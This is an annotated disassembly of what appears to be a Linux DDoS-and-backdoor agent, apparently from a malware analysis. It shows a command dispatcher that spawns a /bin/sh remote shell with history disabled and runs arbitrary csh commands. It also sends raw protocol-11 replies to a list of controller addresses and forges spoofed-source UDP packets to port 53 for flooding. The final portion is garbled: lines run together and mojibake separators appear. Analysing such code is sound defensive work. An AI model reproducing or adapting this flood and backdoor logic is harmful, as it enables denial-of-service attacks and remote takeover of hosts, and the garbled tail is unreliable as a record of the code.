        call dup2               ; dup2(clientfd, 2)
        push 1
        push offset aSbinBinUsrSbin ; "/sbin:/bin:/usr/sbin:/usr/bin:/usr/loca"...
        push offset aPath ; "PATH"
        call setenv             ; setenv("PATH", ..., 1)
        add esp, 24h
        push offset aHistfile ; "HISTFILE"
        call unsetenv           ; unsetenv("HISTFILE")
        push 1
        push offset aLinux ; "linux"
        push offset aTerm ; "TERM"
        call setenv             ; setenv("TERM", "linux", 1)
        push 0
        push offset aSh ; "sh"
        push offset aBinSh ; "/bin/sh"
        call execl              ; execl("/bin/sh", "sh", NULL)
        mov ecx, [ebp+clientfd]
        push ecx
        call close              ; only reached if execl() fails
        add esp, 20h
        push 0
        call exit

loc_8048AC4: ; CODE XREF: main+875j
        push 0
        call exit
        nop

; case 0x6: run a shell command, discarding its output.  Same double-fork
; and kill(dword_807E770, SIGKILL) watchdog as case 0x2, but the watchdog
; waits 0x4B0 = 1200 s and the command is /bin/csh -f -c "<cmd>".
case0x6: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+210o
        call fork ; case 0x6
        mov ds:dword_807E770, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        call setsid
        push 1                  ; SIG_IGN
        push 11h                ; SIGCHLD
        call signal
        call fork
        add esp, 8
        test eax, eax
        jz short loc_8048B18
        push 4B0h
        call sleep              ; sleep(1200)
        push 9
        mov eax, ds:dword_807E770
        push eax
        call kill               ; kill(dword_807E770, SIGKILL)
        push 0
        call exit
        lea esi, [esi]

loc_8048B18: ; CODE XREF: main+9C2j
        xor ebx, ebx
        lea esi, [esi]

loc_8048B1C: ; CODE XREF: main+9FDj
        mov al, [ebx+ebp-0FFEh] ; cmdbuf[ebx + 2]
        mov [ebx+ebp-1000h], al ; cmdbuf[ebx]
        inc ebx
        cmp ebx, 18Dh
        jle short loc_8048B1C
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        push offset aBinCshFCS ; "/bin/csh -f -c \"%s\" "
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf
        push ebx
        call system
        push 0
        call _exit

; case 0x7: stop the running task: kill(child_pid, SIGKILL); child_pid = 0.
case0x7: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+214o
        mov eax, ds:child_pid ; case 0x7
        test eax, eax
        jz loc_8048EB8 ; default (nothing running)
        push 9
        push eax
        call kill
        mov ds:child_pid, 0
        add esp, 8
        jmp loc_8048EB8 ; default
; ---------------------------------------------------------------------------
        align 4

; case 0x8: start task 9.  Like case 0x3 but lookup_step comes from the
; command: sub_8049174(cmdbuf[2], cmdbuf[3], cmdbuf[4], cmdbuf[5], cmdbuf[6],
; cmdbuf[7], cmdbuf[8], cmdbuf[9], var_44BC); string argument at cmdbuf[0xA].
case0x8: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+218o
        cmp ds:child_pid, 0 ; case 0x8
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 9
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048BC4: ; CODE XREF: main+AA5j
        mov al, [ebx+ebp-44B2h] ; var_44BC[ebx + 0xA]
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048BC4
        lea eax, [ebp+var_44BC]
        push eax                ; srchost
        movzx eax, [ebp+cmdbuf+9]
        push eax                ; use_srchost
        movzx eax, [ebp+cmdbuf+8]
        push eax                ; srcport_lo
        movzx eax, [ebp+cmdbuf+7]
        push eax                ; srcport_hi
        movzx eax, [ebp+cmdbuf+6]
        push eax                ; lookup_step
        movzx eax, [ebp+cmdbuf+5]
        push eax                ; srcaddr_d
        movzx eax, [ebp+cmdbuf+4]
        push eax                ; srcaddr_c
        movzx eax, [ebp+cmdbuf+3]
        push eax                ; srcaddr_b
        movzx eax, [ebp+cmdbuf+2]
        push eax                ; srcaddr_a
        call sub_8049174
        add esp, 24h
        push 0
        call _exit
        db 8Dh,76h,0 ; lea esi, [esi+0]

; case 0x9: start task 0xA: sub_8049D40(cmdbuf[2..0xC], 0, cmdbuf[0xD],
; var_44BC) (14 arguments); string argument at cmdbuf[0xE].
; sub_8049D40 is not in this listing.
case0x9: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+21Co
        cmp ds:child_pid, 0 ; case 0x9
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 0Ah
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048C78: ; CODE XREF: main+B59j
        mov al, [ebx+ebp-44AEh] ; var_44BC[ebx + 0xE]
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048C78
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        push 0
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049D40
        add esp, 38h
        push 0
        call _exit
        nop

; case 0xa: start task 0xB: sub_8049D40(cmdbuf[2..0xE], var_44BC)
; (14 arguments, all taken from the command); string argument at cmdbuf[0xF].
case0xa: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+220o
        cmp ds:child_pid, 0 ; case 0xa
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 0Bh
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048D4C: ; CODE XREF: main+C2Dj
        mov al, [ebx+ebp-44ADh] ; var_44BC[ebx + 0xF]
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048D4C
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Eh]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049D40
        add esp, 38h
        push 0
        call _exit
        db 8Dh,76h,0 ; lea esi, [esi+0]

; case 0xb: start task 0xC: sub_8049564(cmdbuf[2..0xD], var_44BC)
; (13 arguments); string argument at cmdbuf[0xE].  sub_8049564 is not in
; this listing.
case0xb: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+224o
        cmp ds:child_pid, 0 ; case 0xb
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 0Ch
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048E28: ; CODE XREF: main+D09j
        mov al, [ebx+ebp-44AEh] ; var_44BC[ebx + 0xE]
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048E28
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049564
        add esp, 34h
        push 0
        call _exit
        db 8Dh,76h,0 ; lea esi, [esi+0]

; default: 10 ms pause, then wait for the next datagram.
loc_8048EB8: ; CODE XREF: main+1A5j main+1B4j ...
        push 2710h ; default
        call usleep             ; usleep(10000)
        add esp, 4
        jmp process_command_packet
main endp

; ---------------------------------------------------------------------------
        db 8Dh
        db 36h ; 6

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; broadcast_packet(address_list, data, datalen)
;   address_list - 10 x 4-byte destination addresses (main's addrlist)
;   data/datalen - encoded reply to send
; Mode cmdbuffbyte1 == 0: one send_packet() to address_list[0] only.
; Any other mode: send_packet() to all 10 entries, 4 ms apart.
; Source address for every packet is the global dataptr (set by case 0x1).
; Always returns 1; send_packet() failures are not reported.
broadcast_packet proc near ; CODE XREF: main+2AFp main+5ABp

var_C = byte ptr -0Ch
address_list = dword ptr 8
data = dword ptr 0Ch
datalen = dword ptr 10h

        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov eax, [ebp+address_list]
        mov edi, [ebp+datalen]
        cmp ds:cmdbuffbyte1, 0
        jz short loc_8048F10
        mov ebx, eax
        lea esi, [ebx+36]       ; last entry = list + 9 * 4
        lea esi, [esi]

loc_8048EE8: ; CODE XREF: broadcast_packet+3Ej
        push 0FA0h
        call usleep             ; usleep(4000)
        push edi
        mov edx, [ebp+data]
        push edx
        push ebx
        push offset dataptr
        call send_packet        ; send_packet(dataptr, &list[i], data, datalen)
        add esp, 14h
        add ebx, 4
        cmp ebx, esi
        jle short loc_8048EE8
        jmp short loc_8048F20
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_8048F10: ; CODE XREF: broadcast_packet+13j
        push edi
        mov edx, [ebp+data]
        push edx
        push eax
        push offset dataptr
        call send_packet        ; send_packet(dataptr, &list[0], data, datalen)

loc_8048F20: ; CODE XREF: broadcast_packet+40j
        mov eax, 1
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
broadcast_packet endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; sub_8048F30(buf, len): ones'-complement (Internet) checksum of len bytes
; at buf -- sums 16-bit words, adds a trailing odd byte, folds the carries
; twice and returns ~sum & 0xFFFF.  No callers appear in this listing; the
; same sequence is inlined in send_packet and sub_8049174.
sub_8048F30 proc near

var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 4
        push ebx
        mov edx, [ebp+arg_4]    ; edx = remaining length
        mov ebx, [ebp+arg_0]    ; ebx = cursor
        xor ecx, ecx            ; ecx = running sum
        mov [ebp+var_2], 0
        cmp edx, 1
        jle short loc_8048F5C
        lea esi, [esi]

loc_8048F4C: ; CODE XREF: sub_8048F30+2Aj
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        add edx, 0FFFFFFFEh     ; len -= 2
        cmp edx, 1
        jg short loc_8048F4C

loc_8048F5C: ; CODE XREF: sub_8048F30+18j
        cmp edx, 1
        jnz short loc_8048F6C
        mov al, [ebx]           ; odd trailing byte
        mov byte ptr [ebp+var_2], al
        movzx eax, [ebp+var_2]
        add ecx, eax

loc_8048F6C: ; CODE XREF: sub_8048F30+2Fj
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]      ; fold high 16 bits into low
        mov eax, ecx
        sar eax, 10h
        add ecx, eax            ; fold again
        mov eax, ecx
        not ax
        mov [ebp+var_2], ax
        and eax, 0FFFFh
        mov ebx, [ebp+var_8]    ; restore ebx
        mov esp, ebp
        pop ebp
        retn
sub_8048F30 endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; send_packet(srcaddr, dstaddr, out, outlen)
;   srcaddr/dstaddr - pointers to 4 raw IPv4 address bytes
;   out/outlen      - payload to append
; Builds one raw IP datagram in a malloc'd buffer of outlen + 23 bytes:
;   20-byte IP header (v4/IHL 5, tos 0, ttl 0xFA, protocol 0x0B, random id,
;   checksum computed inline), 2-byte data header whose first byte is 3
;   (the second byte is never written -- it is whatever malloc returned),
;   then outlen bytes of out.
; The socket is PF_INET/SOCK_RAW/protocol 0xFF (IPPROTO_RAW; on Linux that
; implies IP_HDRINCL, so the header above is sent as built).  dstaddr is
; formatted as dotted-quad and resolved again via get_haddr() to fill the
; sockaddr_in.  Returns 1 on success, 0 on socket/malloc/sendto failure.
; NOTE(review): the socket is not closed on the malloc-failure and
; sendto-failure paths (loc_8048FCE and the free() before loc_8049118), so a
; descriptor leaks on each such call.
send_packet proc near ; CODE XREF: broadcast_packet+31p
                        ; broadcast_packet+4Fp

var_50 = byte ptr -50h
sockfd = dword ptr -44h
datahdr = dword ptr -40h
iphdr = dword ptr -3Ch
data = dword ptr -38h
var_32 = word ptr -32h
tmpbuf = byte ptr -30h
addr = byte ptr -10h
srcaddr = dword ptr 8
dstaddr = dword ptr 0Ch
out = dword ptr 10h
outlen = dword ptr 14h

        push ebp
        mov ebp, esp
        sub esp, 44h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+dstaddr]
        push 0FFh ; proto = FF
        push 3 ; raw
        push 2 ; inet
        call socket ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        cmp eax, 0FFFFFFFFh
        jz short loc_8048FCE    ; socket() failed -> return 0
        mov eax, [ebp+outlen]
        add eax, 17h
        push eax
        call malloc ; malloc(outlen + 23)
        mov esi, eax
        add esp, 4
        test esi, esi
        jnz short loc_8048FD8

loc_8048FCE: ; CODE XREF: send_packet+23j
        xor eax, eax            ; return 0 (sockfd left open here)
        jmp loc_804912C
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8048FD8: ; CODE XREF: send_packet+38j
        mov [ebp+iphdr], esi
        lea edi, [esi+14h]
        mov [ebp+datahdr], edi  ; datahdr = buf + 20
        lea edi, [esi+16h]
        mov [ebp+data], edi     ; data = buf + 22
        mov edi, [ebp+srcaddr]
        mov al, [edi]
        mov [esi+0Ch], al       ; iphdr.saddr = *srcaddr (4 bytes)
        mov al, [edi+1]
        mov [esi+0Dh], al
        mov al, [edi+2]
        mov [esi+0Eh], al
        mov al, [edi+3]
        mov [esi+0Fh], al
        mov al, [ebx]
        mov [esi+10h], al       ; iphdr.daddr = *dstaddr (4 bytes)
        mov al, [ebx+1]
        mov [esi+11h], al
        mov al, [ebx+2]
        mov [esi+12h], al
        mov al, [ebx+3]
        mov [esi+13h], al
        movzx eax, byte ptr [ebx+3]
        push eax
        movzx eax, byte ptr [ebx+2]
        push eax
        movzx eax, byte ptr [ebx+1]
        push eax
        movzx eax, byte ptr [ebx]
        push eax
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf            ; tmpbuf (32 bytes) = dotted-quad of dstaddr
        push ebx
        call get_haddr
        mov dword ptr [ebp+addr+4], eax ; sockaddr_in.sin_addr.s_addr = get_haddr(buf)
        mov word ptr [ebp+addr+2], 0Ah ; sockaddr_in.sin_port = 0x0A (unused by a raw socket)
        mov word ptr [ebp+addr], 2 ; sockaddr_in.sin_family = AF_INET
        mov byte ptr [esi], 45h ; iphdr.version = 0x45
        mov byte ptr [esi+8], 0FAh ; iphdr.ttl = 0xFA
        mov byte ptr [esi+9], 0Bh ; iphdr.protocol = 0x0B
        add esp, 1Ch
        mov ax, word ptr [ebp+outlen]
        add ax, 16h
        xchg al, ah             ; htons
        mov [esi+2], ax ; iphdr.tot_len = outlen + 0x16
        mov byte ptr [esi+1], 0 ; iphdr.tos = 0
        call random
        xchg al, ah
        mov [esi+4], ax ; iphdr.id = random()
        mov word ptr [esi+6], 0 ; iphdr.frag_off = 0
        mov word ptr [esi+0Ah], 0 ; iphdr.check = 0
        ; inline header checksum (same algorithm as sub_8048F30)
        mov edx, 14h ; sizeof(iphdr)
        mov ecx, esi
        xor ebx, ebx
        mov [ebp+var_32], 0

loc_8049094: ; CODE XREF: send_packet+10Ej
        movzx eax, word ptr [ecx]
        add ebx, eax
        add ecx, 2 ; ecx += 2
        add edx, 0FFFFFFFEh ; edx -= 2
        cmp edx, 1
        jg short loc_8049094 ; if (edx > 1)
        jnz short loc_80490B1 ; if (edx != 1)
        mov al, [ecx]
        mov byte ptr [ebp+var_32], al
        movzx eax, [ebp+var_32]
        add ebx, eax

loc_80490B1: ; CODE XREF: send_packet+110j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+var_32], ax
        mov edi, [ebp+iphdr]
        mov [edi+0Ah], ax       ; iphdr.check = ~sum
        mov edi, [ebp+datahdr]
        mov byte ptr [edi], 3   ; data header byte 0 = 3 (agent -> controller)
        mov edi, [ebp+outlen]
        push edi ; outlen
        mov edi, [ebp+out]
        push edi ; out
        mov edi, [ebp+data]
        push edi ; data
        call memcpy ; memcpy(data, out, outlen)
        add esp, 0Ch
        push 10h ; sizeof(addr)
        lea eax, [ebp+addr]
        push eax ; &addr
        push 0 ; 0
        mov eax, [ebp+outlen]
        add eax, 16h
        push eax ; arg_C + sizeof(datahdr)
        push esi ; iphdr
        mov edi, [ebp+sockfd]
        push edi
        call sendto ; sendto(sockfd, iphdr, outlen + 0x16, 0, &addr, sizeof(addr))
        add esp, 18h
        cmp eax, 0FFFFFFFFh
        jnz short loc_8049118
        push esi
        call free ; free(iphdr)
        xor eax, eax ; return 0 (sockfd not closed on this path)
        jmp short loc_804912C
; ---------------------------------------------------------------------------

loc_8049118: ; CODE XREF: send_packet+178j
        mov edi, [ebp+sockfd]
        push edi
        call close ; close(sockfd)
        push esi
        call free ; free(iphdr)
        mov eax, 1 ; return 1

loc_804912C: ; CODE XREF: send_packet+3Cj
                        ; send_packet+182j
        lea esp, [ebp+var_50]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
send_packet endp

; ---------------------------------------------------------------------------
        db 8Dh, 36h

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; get_haddr(name): gethostbyname(name); on success copies h->h_length bytes
; from h->h_addr_list[0] into the 4-byte global dword_80792BC and returns it
; (struct hostent: h_length at +0Ch, h_addr_list at +10h); returns 0 when
; the lookup fails.  Only called with a dotted-quad string from send_packet.
get_haddr proc near ; CODE XREF: send_packet+A6p

arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        push eax
        call gethostbyname
        mov ecx, eax
        add esp, 4
        test ecx, ecx
        jz short loc_804916C
        mov eax, [ecx+10h]      ; h->h_addr_list
        mov edx, [eax]          ; h->h_addr_list[0]
        mov eax, [ecx+0Ch]      ; h->h_length
        push eax
        push edx
        push offset dword_80792BC
        call memcpy             ; memcpy(&dword_80792BC, h_addr_list[0], h_length)
        mov eax, ds:dword_80792BC
        mov esp, ebp
        pop ebp
        retn
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_804916C: ; CODE XREF: get_haddr+13j
        xor eax, eax
        mov esp, ebp
        pop ebp
        retn
get_haddr endp

; ---------------------------------------------------------------------------
        db 8Dh, 36h

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; sub_8049174(srcaddr_a..d, lookup_step, srcport_hi, srcport_lo, use_srchost,
;             srchost) -- task started by cases 0x3 and 0x8.  Judging by the
; parameter names IDA assigned, a raw-packet sender with a caller-supplied
; source address; its body continues beyond the end of this listing, so
; only the prologue is annotated here.
sub_8049174 proc near ; CODE XREF: main+684p main+AEEp

saved_regs = dword ptr -680h
ptr_buffer = dword ptr -674h
offset = dword ptr -670h
destip = dword ptr -66Ch
lookup_counter = dword ptr -668h
lookup_stepper = dword ptr -664h
payload = dword ptr -660h
udphdr = dword ptr -65Ch
sockfd = dword ptr -658h
randomize_start = dword ptr -654h
save_d = dword ptr -650h
save_c = dword ptr -64Ch
save_b = dword ptr -648h
save_a = dword ptr -644h
checksum = word ptr -63Eh
ipaddr = dword ptr -63Ch
buffer = byte ptr -638h
dstaddr = byte ptr -228h
payloads = dword ptr -218h
lengths = dword ptr -24h
srcaddr_a = dword ptr 8
srcaddr_b = dword ptr 0Ch
srcaddr_c = dword ptr 10h
srcaddr_d = dword ptr 14h
lookup_step = dword ptr 18h
srcport_hi = dword ptr 1Ch
srcport_lo = dword ptr 20h
use_srchost = dword ptr 24h
srchost = dword ptr 28h

        push ebp ; initialize stack & preserve registers
        mov ebp, esp ; |
        sub esp, 674h ; |
        push edi ; |
        push esi ; |
        push ebx ; v
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_a], bl ; save_a = a  (low byte of each address arg is kept)
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_b], bl
; save_b = b mov bl, byte ptr [ebp+srcaddr_c] mov byte ptr [ebp+save_c], bl ; save_c = c mov bl, byte ptr [ebp+srcaddr_d] mov byte ptr [ebp+save_d], bl ; save_d = d lea edi, [ebp+lengths] mov esi, offset length_table cld mov ecx, 9 repe movsd ; memcpy(var_24, length_table, 36) mov [ebp+randomize_start], 1 lea edi, [ebp+payloads] mov esi, offset payload_table cld mov ecx, 7Dh repe movsd ; memcpy(var_218, payload_table, 500) lea esi, [ebp+buffer] ; iphdr = (struct iphdr *)buffer lea ebx, [ebp+buffer+14h] mov [ebp+udphdr], ebx ; udphdr = (struct udphdr *)(buffer + sizeof(struct iphdr)) lea ebx, [ebp+buffer+1Ch] mov [ebp+payload], ebx ; payload = buffer + sizeof(struct iphdr) + sizeof(struct udphdr) mov word ptr [ebp+dstaddr], 2 ; dstaddr.sin_family = AF_INET mov word ptr [ebp+dstaddr+2], 0 ; dstaddr.sin_port = 0 cmp [ebp+lookup_step], 0 ; if (!e) jz short loc_804920A dec [ebp+lookup_step] ; e-- loc_804920A: ; CODE XREF: sub_8049174+91j push 0FFh ; *reserved* push 3 ; SOCK_RAW push 2 ; PF_INET call socket ; socket(PF_INET, SOCK_RAW, 0xFF) mov [ebp+sockfd], eax add esp, 0Ch test eax, eax ; if (!sockfd) jle bail_out ; { child_pid = 0; return 0; } mov [ebp+lookup_stepper], 0 ; var_664 = 0 mov [ebp+lookup_counter], 0 ; var_668 = 0 push 400h push 0 push esi call memset ; memset(buffer, 0, sizeof(buffer)) /* sizeof(buffer) == 1024 */ add esp, 0Ch db 8Dh,76h,0 ; lea esi, [esi+0] outer_loop: ; CODE XREF: sub_8049174+140j ; sub_8049174+3CDj xor edi, edi cmp [ebp+use_srchost], 0 jz short loc_80492B2 cmp [ebp+lookup_counter], 0 jg short loc_80492B2 mov ebx, [ebp+srchost] push ebx call gethostbyname mov edx, eax add esp, 4 test edx, edx jnz short loc_8049288 push 258h call sleep mov edi, 1 add esp, 4 jmp short loc_80492B2 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8049288: ; CODE XREF: sub_8049174+FDj push 4 lea eax, [ebp+ipaddr] push eax mov eax, [edx+10h] mov eax, [eax] push eax call bcopy mov eax, [ebp+ipaddr] mov [esi+0Ch], eax mov [ebp+lookup_counter], 9C40h add esp, 
0Ch loc_80492B2: ; CODE XREF: sub_8049174+E2j ; sub_8049174+EBj ... test edi, edi jnz short outer_loop xor edi, edi mov [ebp+offset], 0 lea esi, [esi] inner_loop: ; CODE XREF: sub_8049174+3C7j cmp [ebp+randomize_start], 1 jnz short loc_80492E8 mov [ebp+randomize_start], 0 call __random mov ebx, 8000 cdq idiv ebx jmp short loc_80492EA ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh ; db 36h ; 6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80492E8: ; CODE XREF: sub_8049174+157j xor edx, edx loc_80492EA: ; CODE XREF: sub_8049174+170j cmp iptable[edx*4], 0 jz loc_8049530 lea edx, ds:806D22Ch[edx*4] mov [ebp+destip], edx db 8Dh,76h,0 ; lea esi, [esi+0] loc_8049308: ; CODE XREF: sub_8049174+3B6j mov ebx, [ebp+destip] mov eax, [ebx] mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = *var_66C mov ebx, [ebp+offset] lea edx, [ebp+ebx+payloads] mov eax, [ebp+edi*4+lengths] push eax ; var_24 + edi * 4 push edx ; var_218 + var_670 mov ebx, [ebp+payload] push ebx ; payload call memcpy ; memcpy(payload, var_218 + var_670, var_24 + edi * 4) add esp, 0Ch call __random mov ebx, 255 cdq idiv ebx mov ebx, [ebp+payload] mov [ebx], dl ; payload[0] = random() % 255 call __random mov ebx, 255 cdq idiv ebx mov ebx, [ebp+payload] mov [ebx+1], dl ; payload[1] = random() % 255 cmp [ebp+srcport_hi], 0 jnz short loc_8049380 cmp [ebp+srcport_lo], 0 jnz short loc_8049380 call __random mov ebx, 30000 cdq idiv ebx mov eax, edx jmp short loc_804938A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8049380: ; CODE XREF: sub_8049174+1F3j ; sub_8049174+1F9j mov eax, [ebp+srcport_hi] shl eax, 8 add ax, word ptr [ebp+srcport_lo] loc_804938A: ; CODE XREF: sub_8049174+20Aj xchg al, ah mov ebx, [ebp+udphdr] ; udphdr->source mov [ebx], ax mov ebx, [ebp+udphdr] ; udphdr->dest mov word ptr [ebx+2], 3500h mov ax, word ptr [ebp+edi*4+lengths] add ax, 8 xchg al, ah mov [ebx+4], ax ; udphdr->len mov word ptr [ebx+6], 0 ; udphdr->check cmp [ebp+use_srchost], 0 jnz short loc_80493EC mov bl, byte ptr 
[ebp+save_a] mov [ebp+buffer+0Ch], bl mov bl, byte ptr [ebp+save_b] mov [ebp+buffer+0Dh], bl mov bl, byte ptr [ebp+save_c] mov [ebp+buffer+0Eh], bl mov bl, byte ptr [ebp+save_d] mov [ebp+buffer+0Fh], bl loc_80493EC: ; CODE XREF: sub_8049174+246j mov ebx, [ebp+destip] mov eax, [ebx] mov [esi+10h], eax mov byte ptr [esi], 45h call __random mov ebx, 130 cdq idiv ebx add dl, 120 mov [esi+8], dl call __random mov ebx, 255 cdq idiv ebx mov [esi+4], dx mov byte ptr [esi+9], 11h mov word ptr [esi+6], 0 mov ax, word ptr [ebp+edi*4+lengths] add ax, 1Ch xchg al, ah mov [esi+2], ax mov word ptr [esi+0Ah], 0 mov edx, 14h lea ebx, [ebp+buffer] mov [ebp+ptr_buffer], ebx xor ecx, ecx mov [ebp+checksum], 0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804945C: ; CODE XREF: sub_8049174+302j mov ebx, [ebp+ptr_buffer] movzx eax, word ptr [ebx] add ecx, eax add ebx, 2 mov [ebp+ptr_buffer], ebx add edx, 0FFFFFFFEh cmp edx, 1 jg short loc_804945C jnz short loc_804948B mov al, [ebx] mov byte ptr [ebp+checksum], al movzx eax, [ebp+checksum] add ecx, eax loc_804948B: ; CODE XREF: sub_8049174+304j mov edx, ecx sar edx, 10h movzx eax, cx lea ecx, [eax+edx] mov eax, ecx sar eax, 10h add ecx, eax mov eax, ecx not ax mov [ebp+checksum], ax mov [esi+0Ah], ax push 10h ; sizeof(dstaddr) lea eax, [ebp+dstaddr] push eax ; &dstaddr push 0 ; 0 mov eax, [ebp+edi*4+lengths] add eax, 1Ch push eax ; var_24 + edi * 4 + sizeof(struct iphdr) + sizeof(struct udphdr) lea eax, [ebp+buffer] push eax ; buffer mov ebx, [ebp+sockfd] push ebx ; sockfd call sendto ; sendto(sockfd, buffer, var_24 + edi * 4 + 0x1C, &dstaddr, sizeof(dstaddr)) add esp, 18h cmp [ebp+lookup_step], 0 jnz short loc_80494E8 push 300 call usleep ; usleep(300) jmp short loc_8049507 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80494E8: ; CODE XREF: sub_8049174+366j mov ebx, [ebp+lookup_step] cmp [ebp+lookup_stepper], ebx 